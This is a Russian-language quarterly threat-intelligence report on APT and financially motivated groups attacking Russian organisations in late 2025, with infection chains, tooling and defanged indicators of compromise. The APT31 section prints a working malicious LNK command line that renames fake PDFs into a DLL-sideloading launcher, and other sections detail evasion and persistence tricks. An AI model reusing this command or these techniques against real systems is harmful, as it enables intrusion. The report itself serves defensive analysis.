В IV квартале 2025 года департамент Threat Intelligence PT ESC продолжил мониторинг активности хакерских группировок, нацеленных на российские организации. В рамках отчетного периода внимание было сосредоточено на выявлении и сопоставлении повторяющихся паттернов атак, техник и семейств вредоносного ПО с ретроспективой предыдущих кварталов и лет (для более точной фиксации преемственности инструментов и изменений в тактике). Такой подход позволяет не только описывать отдельные инциденты, но и подтверждать устойчивые паттерны группировок на примере сопоставимых цепочек, как это показано в материалах по APT31 и NetMedved.
Параллельно анализировалась эволюция инструментария группировок в динамике отчетного года, включая изменения в составе инструментов, способах закрепления и скрытного управления, а также в подходах к получению первичного доступа. Наиболее показательным примером в этой части является ExCobalt, для которой характерна регулярная модификация компонентов и адаптация техник под конкретные инфраструктуры и условия эксплуатации. Отдельно фиксировались кейсы активности группировок, ранее не проявлявших выраженного фокуса на российском направлении, включая кампании Silver Fox с использованием фишинговых уведомлений от государственных ведомств.
Накопленные наблюдения по инцидентам и инструментарию дополняются анализом общей динамики за 2025 год: рост числа компьютерных атак и увеличение объема уникальных вредоносных семплов, ассоциированных с APT-группировками, указывают на ускорение цикла разработки и модификации вредоносного ПО. Одним из факторов, влияющих на эту тенденцию, является расширение возможностей по созданию и адаптации кода с использованием больших языковых моделей, которые упрощают разработку и повышают вариативность реализаций при сохранении типовых тактик и техник.
Больше информации об активности кибергруппировок можно получить на нашем портале PT Fusion.
Количество уникальных семплов ВПО, атрибутированных к APT-группировкам
С учетом указанных тенденций настоящая квартальная справка обобщает наблюдения по двум основным направлениям — по шпионской активности и финансово мотивированным атакам — и содержит краткие описания цепочек компрометации, используемых инструментов и ключевых индикаторов.
Шпионаж
АРТ31
| Другие названия | Zirconium Fair Werewolf Violet Typhoon Bronze Vinewood Judgment Panda Sheathminer |
| Начало активности | 2016 |
| Инструменты | PlugX CobaltStrike AufTime CloudyLoader YaLeak CloudSorcerer OneDriveDoor |
| География атак | Беларусь Великобритания Монголия Норвегия Россия Сербия США Финляндия Франция |
| Атакуемые отрасли | Военный сектор Образование Правительственный сектор Производство Сельское хозяйство Телекоммуникации Технологические компании Финансовый сектор Энергетика |
В IV квартале 2025 года специалисты PT ESC по результатам расследований и сопоставления эпизодов за 2024–2025 годы связали часть целевых атак на российский IT-сектор с APT31, восстановили используемые тактики и техники, а также выявили ряд уникальных инструментов. Были отмечены два подтвержденных эпизода, отражающих получение и развитие доступа к инфраструктурам организаций:
- декабрь 2024 года: APT31 использовала таргетированный фишинг с сопроводительным письмом якобы от менеджера по закупкам; во вложении — вредоносный архив «Требования.rar» с LNK-файлом, который запускал документ-приманку и CloudyLoader (загрузчик Cobalt Strike);
- июль 2025 года: установлено, что злоумышленники имели доступ к инфраструктуре уже с конца 2022 года, а развитие атаки началось в новогодние праздники 2023 года.
После получения доступа к инфраструктуре APT31 переходила к сбору информации о среде и активности пользователей. Для этого применялись утилиты и скрипты, извлекающие данные из журналов Windows, а также вспомогательные инструменты для получения данных из браузеров, поиска файлов и извлечения пользовательских заметок (например, SharpADUserIP/SharpChrome/StickyNotesExtract). Инвентаризация сети и первичная сетевая разведка выполнялись с использованием Advanced IP Scanner.
Опираясь на результаты разведки, злоумышленники развивали доступ внутри периметра: создавали учетную запись локального администратора и использовали ее для перемещения между узлами, в том числе через RDP и инструменты WmiExec/SmbExec. Для получения учетных данных применялись как техники pass the hash, так и выгрузка веток реестра с последующим извлечением секретов с помощью secretsdump.py.
Устойчивость обеспечивалась за счет использования планировщика задач Windows: задания маскировались под легитимные, применялась техника скрытых задач — с удалением SecurityDescriptor в ветках TaskCache и удалением XML-файлов заданий из C:\Windows\System32\Tasks. Скрытное управление и обмен данными строились на легитимных веб-сервисах и облачных платформах с использованием зашифрованных туннелей через Tailscale и Microsoft dev tunnels. Следы активности на узлах скрывались среди прочего путем очистки журналов Windows с использованием wevtutil.
Как пример одной из зафиксированных цепочек: жертве приходит фишинговое письмо «от менеджера по закупкам» с архивом «Требования.rar».

Внутри архива находятся LNK-файл и PDF-документы-приманки.
Рисунки 2–5. Архив с LNK-файлом и PDF-документами
При открытии ярлыка выполняется встроенная команда:
"C:\Windows\System32\cmd.exe" /c echo F | xcopy /h /y %cd%\Требования\Требования C:\Users\Public\Downloads\ & start %cd%\Требования\& ren C:\Users\Public\Downloads\Company.pdf nau.exe & ren C:\Users\Public\Downloads\Requirements.pdf BugSplatRc64.dll & C:\Users\Public\Downloads\nau.exeКоманда копирует вложенные файлы в C:\Users\Public\Downloads, открывает каталог с содержимым для создания видимости легитимного контекста, затем переименовывает два PDF в компоненты запуска (Company.pdf → nau.exe, Requirements.pdf → BugSplatRc64.dll) и запускает получившийся nau.exe. Далее реализуется DLL sideloading: при старте nau.exe подгружается библиотека BugSplatRc64.dll из того же каталога, в котором размещен вредоносный код. Исполнение полезной нагрузки инициируется не сразу: сначала реализуется перехват WinAPI-функции из семейства Message API, а уже в обработчике перехвата запускается основная логика вредоносного модуля.
Более подробное описание цепочки атаки, используемого вредоносного ПО и инфраструктуры приведено в статье «Атаки разящей панды: APT31 сегодня».
| Домены | moeodincovo[.]com linuxsecuritycont[.]com sohbetturke[.]com rttvnews[.]com |
| IP-адреса | 89.23.113[.]44 |
| Имена файлов | BugSplatRc64.dll NVIDIADEBUG.dll Program_handler.exe YandexDisk.exe pl_rsrc_english.dll |
| Контрольные суммы | 055736a8a5c22e188d3489a2b35d58ac ca3820abd0331090c77116e2941f7b99 547c897644f770a682a548abe79aef65 9c719435fc6aa0b0f82cf2af5dbb7025 d6be7e21be054f3d63af6cea336db61a |
ExCobalt
| Другие названия | Shedding Zmiy Red Likho Cobalt Werewolf |
| Начало активности | 2023 |
| Инструменты | ADRecon Advanced IP Scanner Babuk Dante Socks5 GSocket Impacket Leaked Wallpaper LockBit Octopus PUMAKIT Revsocks |
| География атак | Беларусь Индонезия Россия Сербия |
| Атакуемые отрасли | Аэрокосмическая промышленность Здравоохранение Индустрия гостеприимства Логистические компании Медиа Образование Правительственный сектор Производство Развлечения Розничная торговля Строительство Телекоммуникации Технологические компании Финансовый сектор Энергетика |
ExCobalt сохраняет высокую интенсивность атак на российские организации, постоянно модифицируя свои средства и техники и адаптируя их под конкретные инфраструктуры и задачи. В IV квартале 2025 года специалисты PT ESC обобщили результаты расследований и разобрали обновленный инструментарий группы.
На входе в инфраструктуру ExCobalt все чаще делает ставку на более тихие способы получения первичного доступа: компрометацию подрядчиков и доступ через опубликованные RDP-сервисы.
В атаках применяется связка средств:
- для удаленного управления и постэксплуатации используется бэкдор Cobint;
- для построения каналов связи и маршрутизации трафика — сетевые туннели GSocket и Revsocks;
- для шифрования инфраструктуры — Babuk для узлов Linux и гипервизоров VMware ESXi и LockBit для узлов Windows.
По мере развития доступа ExCobalt делает акцент на получении учетных данных и захвате доверенных каналов. В частности, используются техники компрометации Telegram через кражу каталога tdata на устройстве жертвы с последующей компрометацией учетной записи.

Также применяется стилер для Outlook Web Access, где вредоносный код внедряется в компонент Flogon, перехватывает учетные данные на этапе ввода и затем передает их злоумышленникам.

Один из способов закрепления в атакованной инфраструктуре, ранее не наблюдавшийся в арсенале ExCobalt, — размещение шеллов в виде отдельных файлов с расширением .epf, которые реализуют механизм внешних обработок в программных продуктах «1С». Такой подход позволяет злоумышленникам выполнять команды в среде «1С» — и сохранять контроль над атакованной средой за счет эксплуатации ее собственных механизмов.

В Linux-сегментах ExCobalt делает ставку на долговременную устойчивость и скрытность, развивая собственные компоненты. Ключевую роль играет руткит уровня ядра PUMAKIT, который маскирует присутствие и поддерживает скрытое управление. В практической реализации используются приемы исполнения без записи на диск, перехват системных вызовов для сокрытия артефактов и извлечения чувствительных данных, а также скрытые механизмы закрепления, включая подмешивание ключа в authorized_keys в оперативной памяти без изменения файла на диске. Управление реализуется через нетривиальный канал с использованием перехваченных системных функций и командных маркеров.
В качестве альтернативного и дополняющего механизма закрепления на Linux применяется инструмент Octopus, который решает задачи повышения привилегий и персистентности за счет модификации легитимных бинарных файлов и сервисов. Он включает набор эксплойтов для локального повышения привилегий и имеет функции внедрения полезной нагрузки в системные компоненты, включая модификацию легитимных утилит и патчинг бинарных файлов. Полезная нагрузка хранится внутри инструмента во встроенном виде, что повышает автономность и снижает зависимость от внешней доставки на этапе закрепления.
Более подробное описание инструментария ExCobalt, а также технические детали по каждому из перечисленных компонентов приведены в статье «(Ex)Cobalt. Обзор инструментов группы в атаках за 2024–2025 годы».
| Домены | rhel.opsecurity1[.]art sec.opsecurity1[.]art qxpngendvvp1.wris[.]monster cnhgenfhfp2.wris[.]monster ccdertsfrp1.wris[.]monster qdprtsorp2.wris[.]monster cckitsfrp1.n3x1lo[.]pro qdkitsorp2.n3x1lo[.]pro cddcvesfhfp1.wris[.]monster deefveskiip2.wris[.]monster cumfpo90sing.agddns[.]net procdia42ecte.agddns[.]net viedeu98.agddns[.]net laipros50.agddns[.]net fira24sonstablee.agddns[.]net chronback49in.duckdns[.]org |
| IP-адреса | 89.23.113[.]204 |
| Контрольные суммы | 43cd2a19b815c609e3b5927d3ab59a67 bceac4f5287f6bf051c1d0c007e37ec8 a58aee3a597b38572ecff77a039a35a1 60d1462836deb5775e2fb7a345767f98 6c0bbb73250887335d7dfe6008d3a6a3 9b4081417f9f77225e280b92038d83e3 38e3824655c1b2cca7d8ad21469c59ae 034a56c1526af1ca76b0c368736d66ee cf86d9ce0e1d5781b999dbb763d6536d d8baba26b5450be7f1ec35616f4e0703 b2e48c9ab63e4e4a5cc76fcab6e832b0 6477933a1ca153ba23ade3c6ac14b878 ea6369c302257dd8650b9f30d3e4c4a3 3e281360bb3fe81745269cf04aab3add 2d8e0f4d649bffba0b13998ac2635b21 262d7599f1263409dbdc402e36658bd7 dede001b1c3aed205c243ac0de86d12f fb461046a25b936abfbf89168d916e98 864ee7604990860e0959e118e3197a96 731ccbf1536f99d7c08707c2323b4259 00e6c33906e956aa744a928f19d858cf 0412d580628ec74f47bf4c80addefd1f c72a27afeb2ea77a319c578ef5484d45 5a7618521010279e14a6b752fb32faf3 |
QuietCrabs
| Другие названия | Subtle Werewolf UTA0178 UNC5221 Red Dev 61 |
| Начало активности | 2023 |
| Инструменты | KrustyLoader BRICKSTORM Sliver |
| География атак | Великобритания Германия Иран Россия США Тайвань Филиппины Чехия Южная Корея Япония |
| Атакуемые отрасли | Военный сектор Здравоохранение Логистические компании Правительственный сектор Производство Телекоммуникации Технологические компании |
В IV квартале 2025 года специалисты PT ESC в ходе расследования двух инцидентов в российских компаниях сопоставили артефакты атак и отнесли часть активности к QuietCrabs.
Для этой группировки характерна работа по модели массового сканирования интернет-сервисов организаций и последующей эксплуатации «RCE-уязвимости энного дня»: после появления публичных и работоспособных PoC и эксплойтов группа в сжатые сроки переходит к практической эксплуатации уязвимых сервисов, что сокращает окно между публикацией и реальной атакой и повышает требования к оперативному патчингу и регулярной проверке внешних сервисов на наличие незакрытых уязвимостей.

В одном из эпизодов злоумышленники эксплуатировали связку уязвимостей в Ivanti Endpoint Manager Mobile (CVE-2025-4427 и CVE-2025-4428), организуя удаленное выполнение команд с выводом результата в файл с расширением .jpg в веб-каталоге и дальнейшим считыванием этого вывода по HTTP.
Во втором эпизоде была зафиксирована эксплуатация уязвимости CVE-2025-53770 в Microsoft SharePoint, после чего развитие атаки на сервере происходило в таком порядке:
- размещение веб-шелла для удаленного выполнения команд;
- доставка и запуск загрузчика;
- развертывание импланта;
- установление соединения с C2-сервером.
На сервере SharePoint был размещен ASPX-веб-шелл, принимающий GET-параметры cmd и timeout и возвращающий результат выполнения команды; выполнение организовано через кодирование команды в Base64 и запуск посредством ScriptRunner.exe, а вывод записывался в файл в каталоге SharePoint, откуда веб-шелл считывал результаты и отдавал оператору.

Перед переходом к следующей стадии злоумышленники выполняли проверки работоспособности узла, включая получение внешнего IP-адреса и тест записи в каталог, после чего загружали KrustyLoader во внешний доступный путь и инициировали его выполнение.
KrustyLoader выступает в роли промежуточного загрузчика на Rust: он расшифровывает ссылку на полезную нагрузку, загружает ее и запускает через внедрение в целевой процесс. В наблюдаемых образцах отмечаются характерные признаки поведения: самокопирование и релокация в %TEMP% с шаблонами имен, содержащими маркеры __selfdelete__ и __relocated__, использование файла C:\Users\Public\Downloads\0 как параметра задержки, многоступенчатая расшифровка URL, а также внедрение в explorer.exe с запуском через RtlCreateUserThread и альтернативные ветки, допускающие загрузку дополнительной полезной нагрузки с последующим внедрением в другой процесс.
Финальной полезной нагрузкой в рассмотренной цепочке выступал Sliver — кроссплатформенный имплант для удаленного управления.
Более подробное описание тактик и техник QuietCrabs, а также разбор этапов атаки и инструментария приведены в статье «Dragons in Thunder».
| Домены | django-server.s3.amazonaws[.]com omnileadzdev.s3.amazonaws[.]com spyne-test.s3.amazonaws[.]com kia-almotores.s3.amazonaws[.]com devscout.s3.amazonaws[.]com tnegadge.s3.amazonaws[.]com gaadhi.s3.amazonaws[.]com check.learnstore[.]vip music.learnstore[.]vip update.learnstore[.]vip api.learnstore[.]vip |
| IP-адреса | 213.183.54[.]111 216.45.58[.]177 223.76.236[.]178 223.76.236[.]179 23.95.193[.]164 156.238.224[.]82 8.211.157[.]186 |
| Контрольные суммы | f662135bdd8bf792a941ea222e8a1330 aed7eef30dbb0e95290b82d8cdb80cef 88c13ad71798482ab15da86fed33a09d 4336ce2c934bdabc0ef24ebc883a97b5 071d0f76e0af21f0a6903523abe90d33 120df631123af5a9273b0f9b3b7592d3 23439741ee63a4ff744e5c3ab1fbba3d c4df40b8250a72ef394a6d844765cbda 070170515d7d1d982164a5a3dd96d5e3 6ca0408e78c732f533dee2bd84df9961 |
Rare Werewolf
| Другие названия | Librarian Ghouls Librarian Likho Rezet |
| Начало активности | 2019 |
| Инструменты | AnyDesk Blat DefenderControl MipkoEmployeeMonitor Tuna |
| География атак | Беларусь Венгрия Казахстан Россия |
| Атакуемые отрасли | Авиационная промышленность Аэрокосмическая промышленность Военный сектор Здравоохранение Индустрия гостеприимства Исследовательские организации Логистические компании Медиа Образование Правительственный сектор Производство Развлечения Розничная торговля Сельское хозяйство Строительство Телекоммуникации Технологические компании Финансовый сектор Энергетика |
В течение IV квартала 2025 года Rare Werewolf проявляла активность против организаций из различных отраслей, используя универсальные легенды, привязанные к типовым бизнес-процессам — оформлению оплаты и договоров, актов, закупочной документации. Первичная доставка строилась на фишинговых письмах, стилизованных под продолжение деловой переписки или служебное уведомление, с вложением запароленного архива и передачей пароля в тексте сообщения.
Рисунки 11–14. Примеры фишинговых писем
После открытия вложения жертва получала «комплект документов»: документ-приманку в DOCX или PDF и исполняемый файл, замаскированный под «смету», «акт», «запрос» или «пакет документов».

При запуске исполняемого файла распаковывались скрипты, легитимные утилиты и вспомогательные компоненты, обеспечивающие дальнейшую цепочку исполнения. Сразу после старта пользователю открывалась приманка для отвлечения внимания, а параллельно загружалась следующая стадия в виде архива и распаковывалась средствами, доставленными на первом этапе.
Рисунки 16–17. Документы-приманки
На узел устанавливался AnyDesk, для закрепления компоненты добавлялись в автозагрузку, а конфигурационные данные AnyDesk из профиля пользователя и ProgramData упаковывались в архивы и эксфильтрировались через консольную почтовую утилиту с использованием заданного SMTP-сервера, что обеспечивало сохранение и восстановление доступа к удаленным сессиям.
Применяемая тактика соответствует наблюдениям предыдущего периода и не претерпела принципиальных изменений.
| Домены | npo-avia[.]online aviator-concern[.]site emailon[.]ru avia-rias[.]site users-office[.]ru qinformation[.]ru user-rembler[.]ru mail-rembler[.]ru email-offices[.]ru email-rembler[.]ru aoffices[.]ru users-offices[.]ru emailoffice[.]ru titan-barykady[.]site zakupky-ru[.]website emailoff[.]ru salut-vpk[.]site vniir-info[.]site winformation[.]ru user-mail[.]ru qqoffice[.]ru mail-rambler[.]ru |
| Имена файлов | 766.com Исх. Письмо Рег. №81853.05 от 22.12.2025.scr Подписанный договор,КП и оплата.com Квитанция.scr журнал регистрации договоров.com Проект контракта.scr Акт приёмки-сдачи услуг по Контракту . № 875-9.Исх. № 521.scr журнал регистрации договоров РФ.pdf.scr |
| Контрольные суммы | bc87ef4a3b522abb29b1008f347851a6 69c59e428adcea5a15f7093fa44e2db1 78ab5ae6dc215e4d76e476028a8fcb6f da9e2d1e2090ca0c16e7014aa3f8024e 7050c3c774389a00a24d169098de1825 c2473271e40a806c20d356236522adf7 2215425569671b75c62a33569334b537 26a72cb8c9dfe7054cca6ab0d9372c41 |
PseudoGamaredon
| Другие названия | Awaken Likho Core Werewolf GamaCopy |
| Начало активности | 2021 |
| Инструменты | MeshAgent MeshСentral UPX UltraVNC MeshAgent ReverseSSH rclone |
| География атак | Беларусь Россия |
| Атакуемые отрасли | Военный сектор Здравоохранение Исследовательские организации Логистические компании Медиа Правительственный сектор Производство Розничная торговля Технологические компании Финансовый сектор |
В IV квартале 2025 года группа киберразведки TI-департамента фиксировала фишинговую активность группировки PseudoGamaredon в адрес правительственного сектора и военно-промышленного комплекса.
Рассылка осуществлялась через электронные письма с архивами-приманками; внутри вложений размещался вредоносный исполняемый файл, а тематика сообщений имитировала официальную корреспонденцию и мобилизационно-учетную документацию.
После открытия замаскированного вредоносного ПО запускается цепочка, сочетающая документ-приманку и автоматизированное развертывание средств удаленного управления.
Рисунки 18–21. Документы-приманки
При запуске пользователем исполняемый файл разворачивает в системе компоненты первого стейджа (dilemma.cmd, распаковщик concrete.exe, архив conserve.rar) и запускает dilemma.cmd.

Скрипт распаковывает conserve.rar во внешний каталог пользователя, после чего запускает компоненты второго стейджа — nasty.cmd, grip.cmd и Teloversync.exe (UltraVNC).
Nasty.cmd выполняет подготовку окружения и закрепление: формирует конфигурационный файл UltraVNC, задавая параметры скрытности и удобства удаленного администрирования, после чего запускает grip.cmd. Дополнительно nasty.cmd закрепляется в системе через планировщик задач, регистрируя периодический запуск в скрытом режиме, чтобы цепочка регулярно восстанавливалась и перезапускала полезную нагрузку.
Grip.cmd отвечает непосредственно за запуск удаленного доступа и сетевую часть. Скрипт принудительно завершает ранее запущенный процесс Teloversync.exe, выполняет повторяющиеся проверки сетевой доступности через nslookup с паузами, формирует идентификатор узла на основе серийного номера системного диска и затем запускает Teloversync.exe с параметрами автоподключения к удаленному узлу управления по TCP-порту 443.
В результате на зараженной рабочей станции разворачивается устойчивый интерактивный удаленный доступ через UltraVNC, который поддерживается за счет регулярного перезапуска через планировщик заданий Windows.
| Домены | kinomirok[.]ru vdaliot[.]ru ilyaforexperts[.]ru dveri-kuban[.]ru bunchahanoithuduc[.]com |
| IP-адреса | 178.255.127[.]86 91.217.81[.]90 45.132.255[.]152 195.2.70[.]182 45.128.148[.]46 45.144.67[.]251 |
| Имена файлов | Запрос прокуратуры Об анализе соблюдения законности при выполнении ГОЗ предприятиями ОПК РФ .exe Уведомление № 221 о начале комплексной проверки согласно плану утечек-1-1.exe Указания начальникам ВП об организации работы по .exe Уведомление № 221 о начале комплексной проверки согласно плану утечек-копия-7.exe Запрос на ПОВСК Расследования уголовного дела № 1240 на территории Октябрьского района СУ УМВД через ВСО.pdf |
| Контрольные суммы | d63d6c9f6c10edb9a228756c9d9b7231 6c28713c6020a8759b902b4d90d78ac6 5842ddf4441c01f5e56051d5c4558b49 6606e5e028dbe2def716fa3c8364ed8f e527cac6c22f38efa39935e48ffbab59 |
Финансово мотивированные группировки
Werewolves
| Другие названия | Lone Wolf Moonshine Trickster |
| Начало активности | 2023 |
| Инструменты | LockBit Cobalt Strike |
| География атак | Гана Италия Нидерланды Россия |
| Атакуемые отрасли | Индустрия гостеприимства Логистические компании Нефтегазовая промышленность Производство Розничная торговля Телекоммуникации Технологические компании Финансовый сектор Электроснабжение Энергетика |
Группа киберразведки в IV квартале 2025 года фиксировала фишинговую кампанию группировки Werewolves. Злоумышленники применяли стеганографию для скрытой доставки загрузчика и выстраивали многоступенчатую цепочку исполнения, завершающуюся запуском Cobalt Strike Beacon в памяти.
Первоначальный доступ реализуется через фишинговое письмо
с вложенным архивом, внутри которого размещены размытое изображение-приманка «досудебное.png» и ярлык «сверка.lnk».

Открытие ярлыка приводит к запуску PowerShell с параметрами скрытого окна и обходом политики выполнения.


Команда читает байты изображения, извлекает XOR-ключ из 145-го байта, находит в ASCII-представлении PNG-файла последний маркер чанка IDAT, затем декодирует данные, расположенные после него, сохраняет результат во временный каталог как %TEMP%\yVLQbWaX.exe — и запускает файл в скрытом режиме. Тем самым изображение используется как контейнер для бинарного стейджа; подход с извлечением полезной нагрузки из сегмента IDAT концептуально повторяет известный класс решений типа IDAT loader.
Далее запущенный yVLQbWaX.exe обращается к ezstat[.]ru/flowersforlove.gif; домен перенаправляет на контролируемый злоумышленниками ресурс valisi[.]ru, где размещен вредоносный HTA-файл. HTA-файл выполняется системной утилитой mshta.exe и содержит код на VBScript, который инициирует очередной запуск PowerShell: он распаковывает Base64-строку в gzip-данные с последующей распаковкой и запускает результат. Итоговый шеллкод соответствует Cobalt Strike Beacon; финальная стадия реализует бесфайловое выполнение в оперативной памяти за счет рефлективной загрузки.
| Домены | valisi[.]ru ecols[.]ru |
| IP-адреса | 188.120.232[.]76 |
| Имена файлов | сверка.lnk досудебное.png |
| Контрольные суммы | ec2924d70d86d24e911202b1523c1858 bc957c0d268732c83c4b1a33a37a5854 38bcebee4a5c0a18a4794ad7c882e536 aed3b15ef7c731cdc8e84c0de42adcdc |
NetMedved
| Другие названия | Clubfoot Wolf |
| Начало активности | 2024 |
| Инструменты | Lumma NetSupport |
| География атак | Россия |
| Атакуемые отрасли | Логистические компании Розничная торговля |
Группа киберразведки в октябре 2025 года зафиксировала продолжающуюся фишинговую активность группировки NetMedved, нацеленную на российские организации. В качестве конечной полезной нагрузки используется вредоносная сборка легитимного средства для удаленного администрирования NetSupport Manager (NetSupportRAT).
Первоначальный доступ реализуется через фишинговые рассылки с архивами, содержащими набор документов-приманок, имитирующих типовой документооборот российских компаний (карточки контрагентов, приказы о назначении, свидетельства о постановке на учет), а также замаскированный вредоносный LNK-файл, оформленный под очередной сопроводительный файл.
Рисунки 26–28. Содержимое архива
На рабочей станции жертвы LNK-файл запускает PowerShell в скрытом режиме, причем существенная часть логики вынесена прямо в командную строку ярлыка: это характерная особенность кампании.
Выполняются проверки, направленные на противодействие анализу:
- По процессам: поиск работающих инструментов отладки и мониторинга (Procmon/Procmon64, Process Hacker, x64dbg/x32dbg, Wireshark, Fiddler, IDA).
- По аппаратным признакам: выход при количестве логических процессов меньше 2 или разрешении экрана ниже порогов (ширина менее 800, высота менее 600).

При успешном прохождении проверок цепочка переходит к следующему шагу — развертыванию полезной нагрузки: PowerShell-сценарий создает рабочий каталог в LocalAppData, скачивает ZIP-архив, замаскированный под PDF, распаковывает его штатными средствами, открывает документ-приманку и параллельно запускает NetSupportRAT, после чего создает задачу в планировщике заданий Windows для автозапуска модуля при входе пользователя. В составе распакованного набора, помимо бинарных компонентов, присутствует конфигурационный файл client32.ini, в котором жестко заданы домены для подключения к серверам управления.
К концу октября — началу ноября 2025 года операторы расширили инфраструктуру и, помимо варианта с PowerShell-скриптом, использовали альтернативный способ получения и исполнения промежуточного командного блока, который запускает ту же логику развертывания полезной нагрузки: LNK-файл запускает cmd.exe, выполняет запрос finger к узлу api.metrics-strange[.]com и перенаправляет вывод команды напрямую в cmd для немедленного исполнения.
На этом этапе снова выполняются проверки против анализа, затем создается случайный путь в LocalAppData, через where находится легитимный curl, сохраняется его копия под случайным именем, выполняются загрузка ZIP-архива (маскировка под PDF), распаковка встроенной утилитой tar, открытие приманки и запуск NetSupportRAT через rundll32, после чего создается задача в планировщике для закрепления.
Более подробное описание цепочки атаки, используемого вредоносного ПО приведено в статье «„Медвед“ атакует: что мы узнали про фишинговую кампанию группировки, нацеленной на российские организации».
| Домены | tvfilia[.]com skillswar[.]com pdfbypari[.]com nicevn[.]net metrics-strange[.]com api.metrics-strange[.]com x-projectlys[.]com |
| IP-адреса | 31.214.157[.]85 185.158.249[.]54 80.66.76[.]115 31.214.157[.]214 |
| Контрольные суммы | 7c747a3bae1b6093273fb59be92947c8 fc53d4925a9e5f0a2d84bb7185da1874 f9b64f0da33c475658ea206a484d236f 1b8fef7767370b985214470cf4e56a24 7cb00849d03ffa13ab9e5b077e161608 01a43d17f909792addcc004bdd513963 192c0538c375d9c5064a39f07e5b3744 7cec93c66b8fce48eb393c176936d146 84677cb94f1772c22d9d82114a4a4038 435e3d7ab7f4939a00332f823a923c8f 219a47f8a1820d131fa90f0e15230197 8944560ed965974f843fc984e417457e 63a769becb77120637e242b5a3e41649 25f5b04a7cb54ae588235cf7cf3a89f4 0b314bd55b9a3e318e3c207e597f3e5f 002bca1bb5ccc22049aa918aafc174a7 ba454a50b727cd724066ce2cfd575b9d d0f7cdde46cd23cb01d70c88b92e7080 |
Silver Fox
| Другие названия | Void Arachne |
| Начало активности | 2024 |
| Инструменты | ValleyRAT HoldingHands RAT Gh0stCringe RAT Sainbox RAT |
| География атак | Вьетнам Индия Китай Малайзия Россия Сингапур США Таиланд Тайвань Филиппины Южная Корея Япония |
| Атакуемые отрасли | Правительственный сектор Здравоохранение Образование Розничная торговля Телекоммуникации Финансовый сектор |
Группа киберразведки департамента Threat Intelligence PT ESC зафиксировала фишинговую кампанию финансово мотивированной группировки Silver Fox.
В ходе исследования были обнаружены атаки на несколько российских банков: письма рассылались с домена onmbv[.]com, зарегистрированного 14 сентября 2025 года и используемого в качестве инфраструктурной базы для рассылки. Сообщения имитировали уведомления якобы от ФНС о налоговой проверке и побуждали получателей скачать «пакет документов» во вложенном архиве.

Архивы содержали набор файлов, включая исполняемый файл, несколько DLL и PNG-файлов, при этом ключевую роль в цепочке играли три объекта — исполняемый файл-декой с PDF-иконкой, библиотека QQMusicCommon.dll и изображение 9LmcIWuG.png. Исполняемый файл сам по себе не содержал вредоносной логики и использовался как контейнер запуска, а также как элемент социальной инженерии; на VirusTotal он встречался под разными названиями и загружался из разных регионов, включая Россию и Тайвань.

Дальнейшая эксплуатация строилась на технике DLL sideloading. При запуске исполняемый файл подгружал QQMusicCommon.dll, маскирующуюся под компонент популярного китайского сервиса QQ Music. Библиотека была обфусцирована, и в итоге выполняла роль дроппера: она считывала и расшифровывала полезную нагрузку из PNG-файла 9LmcIWuG.png и запускала полученный модуль. Таким образом, основная вредоносная функциональность доставлялась скрытно, а контейнером для полезной нагрузки выступало изображение.
Во всех выявленных на российском направлении случаях финальной полезной нагрузкой являлся ValleyRAT, для связи с управляющей инфраструктурой использовался C2-сервер на IP-адресе 207.56.138[.]28. ValleyRAT представляет собой троян удаленного доступа на C++, позволяющий злоумышленникам выполнять удаленные команды, наблюдать за активностью на устройстве, похищать данные и доставлять дополнительные модули. По ряду оценок, он функционально близок к семейству Gh0st RAT, но рассматривается как отдельное ПО со схожими возможностями, активно распространяемое с 2023 года через фишинг и поддельные установщики.
Параллельно в ходе анализа были выявлены многочисленные архивы, ориентированные на индийские организации и использующие схожую легенду от имени Central Board of Direct Taxes. Для части индийских артефактов использовалась та же инфраструктура управления, однако был обнаружен также дополнительный C2-сервер 108.187.37[.]85, характерный преимущественно для индийского трека. Независимо от конкретного C2-сервера цепочка оставалась неизменной: архив с декойным .exe-файлом, загрузка вредоносной DLL через DLL sideloading и извлечение ValleyRAT из изображения. Отдельные загрузки фиксировались также из Непала и Индонезии, но основной массив артефактов относился к Индии; активность против индийских компаний началась раньше, чем против российских, и датируется началом декабря 2025 года.
С учетом повторяемых техник, используемого стека и инфраструктурных признаков, а также ранее описанных кейсов использования ValleyRAT в финансово мотивированных цепочках наиболее вероятной является атрибуция активности группировке Silver Fox, известной многоступенчатыми цепочками доставки с применением sideloading и скрытой упаковки полезной нагрузки.
| IP-адреса | 207.56.138[.]28 108.187.37[.]85 |
| Имена файлов | ФНС России -.zip |
| Контрольные суммы | 76fb10281c43c227faae7090736939f2 997ee6c829a977efe1c31b66b5ec49f9 2b6d74dd1a3d7d715a0c7057d7347a9e ab9794c41cc40f72a304c6556bf8b377 c11d05f0432ca97e5029c4f26feb52e7 b4b0a91ae6c511c6cdb5b17a98f6e261 e26e5b8e37c2edbc330d319f201d5982 d30609b6e7492435a6bdcea67834c996 990a0ecf6ced5bf7d7b1f88f2827949f |
Hive0117
| Другие названия | Watch Wolf Ratopak Spider UAC-0008 |
| Начало активности | 2022 |
| Инструменты | DarkWatchman Buhtrap FlawedAmmyy UltraVNC |
| География атак | Латвия Литва Россия США Украина Эстония |
| Атакуемые отрасли | Индустрия гостеприимства Логистические компании Правительственный сектор Производство Розничная торговля Сельское хозяйство Строительство Телекоммуникации Технологические компании Финансовый сектор Энергетика |
В декабре 2025 года группа киберразведки TI-департамента фиксировала массовую фишинговую рассылку группировки Hive0117. Кампания была ориентирована на организации строительного сектора и использовала типовую легенду с документами во вложении и паролем к архиву в теле письма.

Механика заражения соответствует цепочке, описанной специалистами PT ESC ранее, и принципиально не изменилась.
После открытия запароленного архива пользователь видит исполняемый файл, название которого повторяет тему письма. При запуске исполняемого SCR-файла происходит распаковка PowerShell-кейлоггера и вредоносного JavaScript-скрипта, после чего JavaScript-код запускается через wscript.exe. Для маскировки активности пользователю дополнительно показывается правдоподобное окно ошибки, тогда как вредоносный скрипт продолжает исполняться в фоновом режиме.
Рисунки 33–34. Вредоносные файлы и окно ошибки
Далее вредоносное ПО осуществляет закрепление: при первом запуске создается задача на автозапуск в планировщике заданий и прописываются служебные параметры в реестре. Для снижения вероятности детектирования скрипт добавляет себя в исключения Microsoft Defender и, при наличии административных прав, очищает точки восстановления.
